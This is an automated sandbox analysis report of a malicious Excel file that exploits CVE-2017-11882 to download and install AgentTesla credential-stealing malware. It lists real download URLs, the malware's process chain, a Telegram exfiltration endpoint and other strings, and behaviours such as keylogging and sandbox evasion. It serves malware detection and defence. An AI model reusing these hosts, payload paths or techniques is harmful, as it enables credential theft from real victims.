Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SpecificationX20202611.xlsx

Overview

General Information

Sample Name:SpecificationX20202611.xlsx
Analysis ID:323613
MD5:8bbf38221e93da549de22199cafb1ece
SHA1:4d650073a4fd46217e891c94d6eca54644addfb6
SHA256:1cea11e60bce272e08ef8906924229cc33ba41dc2903ca2c397eb0ca70d85196

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Contains functionality to detect sleep reduction / modifications
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2276 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2396 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 2948 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
      • name.exe (PID: 912 cmdline: C:\Users\Public\name.exe MD5: 45E25807FC1BD31A0B8309C44AFCE6E4)
        • name.exe (PID: 1616 cmdline: C:\Users\Public\name.exe MD5: 45E25807FC1BD31A0B8309C44AFCE6E4)
  • Hqfadrv.exe (PID: 3068 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe' MD5: 45E25807FC1BD31A0B8309C44AFCE6E4)
    • Hqfadrv.exe (PID: 2732 cmdline: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe MD5: 45E25807FC1BD31A0B8309C44AFCE6E4)
  • Hqfadrv.exe (PID: 1684 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe' MD5: 45E25807FC1BD31A0B8309C44AFCE6E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\afqH.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x9b:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\afqH.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\afqH.urlMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x70:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2352654865.0000000001EE2000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000007.00000002.2352856247.0000000002140000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000B.00000002.2352775112.0000000002060000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.name.exe.2140000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              11.2.Hqfadrv.exe.2060000.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                11.2.Hqfadrv.exe.450000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  11.2.Hqfadrv.exe.450000.1.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    11.2.Hqfadrv.exe.2060000.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 3 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2396, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe, ProcessId: 2948
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 128.199.253.44, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2396, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2396, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lxpo[1].exe
                      Sigma detected: Executables Started in Suspicious FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\name.exe, CommandLine: C:\Users\Public\name.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\name.exe, NewProcessName: C:\Users\Public\name.exe, OriginalFileName: C:\Users\Public\name.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2948, ProcessCommandLine: C:\Users\Public\name.exe, ProcessId: 912
                      Sigma detected: Execution in Non-Executable FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\name.exe, CommandLine: C:\Users\Public\name.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\name.exe, NewProcessName: C:\Users\Public\name.exe, OriginalFileName: C:\Users\Public\name.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2948, ProcessCommandLine: C:\Users\Public\name.exe, ProcessId: 912
                      Sigma detected: Suspicious Program Location Process StartsShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\name.exe, CommandLine: C:\Users\Public\name.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\name.exe, NewProcessName: C:\Users\Public\name.exe, OriginalFileName: C:\Users\Public\name.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2948, ProcessCommandLine: C:\Users\Public\name.exe, ProcessId: 912

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: SpecificationX20202611.xlsxVirustotal: Detection: 62%Perma Link
                      Source: SpecificationX20202611.xlsxReversingLabs: Detection: 53%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeJoe Sandbox ML: detected
                      Source: C:\Users\Public\name.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lxpo[1].exeJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: SpecificationX20202611.xlsxJoe Sandbox ML: detected

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00408DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_004059A0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 4x nop then mov eax, dword ptr [00484078h]
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 4x nop then mov eax, dword ptr [ebx]
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 4x nop then or edx, 00000080h
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 4x nop then mov edx, dword ptr [eax]
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 4x nop then call 00402D28h
                      Source: global trafficDNS query: name: khunnapap.com
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 162.159.136.232:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 128.199.253.44:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 100000132 COMMUNITY WEB-MISC Proxy Server Access 128.199.253.44:80 -> 192.168.2.22:49165
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 27 Nov 2020 07:27:03 GMTContent-Type: application/x-msdownloadContent-Length: 1218752Last-Modified: Wed, 25 Nov 2020 04:41:22 GMTConnection: keep-aliveETag: "5fbde072-1298c0"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 af c1 0b 01 02 19 00 e8 07 00 00 56 0a 00 00 00 00 00 98 f6 07 00 00 10 00 00 00 00 08 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 12 00 00 06 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 08 00 ca 24 00 00 00 30 09 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 44 12 00 c0 54 00 00 00 a0 08 00 34 8f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 08 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 14 e7 07 00 00 10 00 00 00 e8 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 9c 21 00 00 00 00 08 00 00 22 00 00 00 ee 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 35 11 00 00 00 30 08 00 00 00 00 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ca 24 00 00 00 50 08 00 00 26 00 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 80 08 00 00 00 00 00 00 36 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 90 08 00 00 02 00 00 00 36 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 34 8f 00 00 00 a0 08 00 00 90 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 7c 09 00 00 30 09 00 00 7c 09 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 12 00 00 00 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
                      Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                      Source: global trafficHTTP traffic detected: GET /inc/lxpo.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: khunnapap.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: fanosethiopiatours.com
                      Source: global trafficHTTP traffic detected: GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: fanosethiopiatours.com
                      Source: global trafficHTTP traffic detected: GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: fanosethiopiatours.com
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lxpo[1].exeJump to behavior
                      Source: global trafficHTTP traffic detected: GET /inc/lxpo.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: khunnapap.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: fanosethiopiatours.com
                      Source: global trafficHTTP traffic detected: GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: fanosethiopiatours.com
                      Source: global trafficHTTP traffic detected: GET /components/com_messages/controllers/messages08/Hqfafff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: fanosethiopiatours.com
                      Source: unknownDNS traffic detected: queries for: khunnapap.com
                      Source: name.exe, 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: Hqfadrv.exe, 0000000A.00000002.2343504552.0000000000294000.00000004.00000020.sdmp, Hqfadrv.exe, 0000000A.00000002.2343547059.00000000002D1000.00000004.00000020.sdmpString found in binary or memory: http://fanosethiopiatours.com/components/com_messages/controllers/messages08/Hqfafff
                      Source: Hqfadrv.exe, Hqfadrv.exe, 0000000B.00000000.2338557274.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe.6.drString found in binary or memory: http://gorohov.narod.ru/index.htm
                      Source: name.exe, 00000006.00000000.2145781433.0000000000401000.00000020.00020000.sdmp, name.exe, 00000007.00000000.2214244196.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe, 00000009.00000000.2236985625.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe, 0000000A.00000000.2254253931.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe, 0000000B.00000000.2338557274.0000000000401000.00000020.00020000.sdmp, Hqfadrv.exe.6.drString found in binary or memory: http://gorohov.narod.ru/index.htmS
                      Source: Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmpString found in binary or memory: http://rMSjwD.com
                      Source: name.exe, 00000007.00000002.2355651047.00000000057C0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: name.exe, 00000007.00000002.2355651047.00000000057C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                      Source: name.exe, 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
                      Source: name.exe, 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2353817984.00000000023FC000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00435CA4 OpenClipboard,GlobalAlloc,GlobalFix,EmptyClipboard,SetClipboardData,GlobalUnWire,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0042B278 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0042B8BC GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0043E2D8 GetKeyboardState,
                      Source: C:\Users\Public\name.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lxpo[1].exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\name.exeJump to dropped file
                      Source: C:\Users\Public\name.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\Public\name.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\Public\name.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\Public\name.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0045C770 NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00441274 NtdllDefWindowProc_A,GetCapture,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0045CF14 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0045CFC4 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00435110 NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0045197C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
                      Source: C:\Users\Public\name.exeCode function: 7_2_00408C60
                      Source: C:\Users\Public\name.exeCode function: 7_2_0040DC11
                      Source: C:\Users\Public\name.exeCode function: 7_2_00407C3F
                      Source: C:\Users\Public\name.exeCode function: 7_2_00418CCC
                      Source: C:\Users\Public\name.exeCode function: 7_2_00406CA0
                      Source: C:\Users\Public\name.exeCode function: 7_2_004028B0
                      Source: C:\Users\Public\name.exeCode function: 7_2_0041A4BE
                      Source: C:\Users\Public\name.exeCode function: 7_2_00418244
                      Source: C:\Users\Public\name.exeCode function: 7_2_00401650
                      Source: C:\Users\Public\name.exeCode function: 7_2_00402F20
                      Source: C:\Users\Public\name.exeCode function: 7_2_004193C4
                      Source: C:\Users\Public\name.exeCode function: 7_2_00418788
                      Source: C:\Users\Public\name.exeCode function: 7_2_00402F89
                      Source: C:\Users\Public\name.exeCode function: 7_2_00402B90
                      Source: C:\Users\Public\name.exeCode function: 7_2_004073A0
                      Source: C:\Users\Public\name.exeCode function: 7_2_003EF638
                      Source: C:\Users\Public\name.exeCode function: 7_2_003EE618
                      Source: C:\Users\Public\name.exeCode function: 7_2_003E1040
                      Source: C:\Users\Public\name.exeCode function: 7_2_003EE960
                      Source: C:\Users\Public\name.exeCode function: 7_2_003E12B8
                      Source: C:\Users\Public\name.exeCode function: 7_2_003E132C
                      Source: C:\Users\Public\name.exeCode function: 7_2_003E1371
                      Source: C:\Users\Public\name.exeCode function: 7_2_003E1394
                      Source: C:\Users\Public\name.exeCode function: 7_2_003E0FCF
                      Source: C:\Users\Public\name.exeCode function: 7_1_00408C60
                      Source: C:\Users\Public\name.exeCode function: 7_1_0040DC11
                      Source: C:\Users\Public\name.exeCode function: 7_1_00407C3F
                      Source: C:\Users\Public\name.exeCode function: 7_1_00418CCC
                      Source: C:\Users\Public\name.exeCode function: 7_1_00406CA0
                      Source: C:\Users\Public\name.exeCode function: 7_1_004028B0
                      Source: C:\Users\Public\name.exeCode function: 7_1_0041A4BE
                      Source: C:\Users\Public\name.exeCode function: 7_1_00418244
                      Source: C:\Users\Public\name.exeCode function: 7_1_00401650
                      Source: C:\Users\Public\name.exeCode function: 7_1_00402F20
                      Source: C:\Users\Public\name.exeCode function: 7_1_004193C4
                      Source: C:\Users\Public\name.exeCode function: 7_1_00418788
                      Source: C:\Users\Public\name.exeCode function: 7_1_00402F89
                      Source: C:\Users\Public\name.exeCode function: 7_1_00402B90
                      Source: C:\Users\Public\name.exeCode function: 7_1_004073A0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00456B7C
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_00434E00
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 10_2_0045197C
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_00408C60
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_0040DC11
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_00407C3F
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_00418CCC
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_00406CA0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_004028B0
